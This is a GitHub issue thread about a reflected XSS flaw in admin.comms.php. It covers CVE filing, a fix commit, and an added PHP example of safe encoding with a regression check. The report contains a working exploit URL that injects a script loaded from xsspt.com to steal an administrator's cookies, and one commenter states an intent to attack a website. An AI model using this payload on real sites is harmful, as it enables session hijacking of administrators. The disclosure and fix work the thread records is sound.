XSS vulnerability in admin.comms.php #253
Comments
I don't really see how you can abuse this to get an administrator's cookie?

Try Firefox

The use of a certain limit, but does not affect the vulnerability of the harm. I'm trying to exploit this vulnerability to attack a website.

If a user opens the link in their browser the script will be executed; this is how your cookie is stolen. However, this link does more than just show an alert for demonstration purposes: this link actually downloads a script and runs it! DO NOT CLICK THE LINK

Please apply for a CVE number on this site: https://cveform.mitre.org/

Very useful for such small software, @l33cy; rather show them the fix for it ;)

@l33cy we have had many security holes that were patched and never were on CVE

Applying for a CVE for such an exploit in a small open source project would take longer than just fixing it, as the fix would just be the filtering of every $_GET, $_POST and $_SERVER variable. Consider it patched by tomorrow.

Fixed with e63701e
There is a reflective XSS vulnerability on line 21 of the admin.comms.php file.
Hackers can exploit this vulnerability to obtain an administrator's cookies.
http://domain/index.php?p=admin&c=comms&rebanid=1123123123123123123231223");</script><script src=http://xsspt.com/phssz8?1492070578></script><script>alert("a

Effect in browser:
code:
Do not print the user input data directly on the page. Please.
My English is so poor.
Could you help me apply for a CVE number for this vulnerability?
I need it.
Thank you very much.
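The pattern the report describes (a query parameter echoed straight into the page) beside the context-aware encoding that the "filter every $_GET/$_POST" fix comment amounts to, as an added example that is not the project's code; `rebanid` is the parameter named in the report, while the surrounding markup and the function names are assumed.

```php
<?php
// Added example, not the project's code. `rebanid` is the parameter named in
// the report; the markup around it and the function names are assumed.

// BEFORE (the reported bug class): the query value is printed straight into
// the HTML body and into an inline <script>, so a value containing quotes and
// </script> ends the string and the element and runs as script.
function render_unsafe(string $rebanid): string
{
    return '<p>Re-banned ID: ' . $rebanid . '</p>' . "\n"
         . '<script>var rebanid = "' . $rebanid . '";</script>';
}

// One encoder per output context.
function e_html(string $s): string
{
    // Escapes < > & " '; ENT_SUBSTITUTE keeps invalid UTF-8 from aborting the output.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function e_js(string $s): string
{
    // A JSON string literal with < > & ' " hex-escaped, so "</script>" cannot
    // appear in the output even though the value sits inside a <script> element.
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// AFTER: validate what has a known shape, encode everything that is echoed.
function render_safe(string $rebanid): string
{
    // A ban id is a non-negative integer; reject anything else rather than "clean" it.
    if (filter_var($rebanid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]) === false) {
        return '<p>Invalid id: ' . e_html($rebanid) . '</p>';
    }
    return '<p>Re-banned ID: ' . e_html($rebanid) . '</p>' . "\n"
         . '<script>var rebanid = ' . e_js($rebanid) . ';</script>';
}

// Constructed input in the shape of the report's payload (alert only, no remote script).
$payload = '1");</script><script>alert("a';

echo "unsafe:\n", render_unsafe($payload), "\n\n";
echo "safe:\n",   render_safe($payload),   "\n\n";
echo "safe:\n",   render_safe('42'),       "\n";

// Regression check for the fix: no tag from the input may reach the output unencoded.
assert(strpos(render_safe($payload), '</script>') === false);
```

Run it with the PHP CLI; the "unsafe" output shows the closing `</script>` from the input landing in the page, while both "safe" outputs show only encoded or validated values.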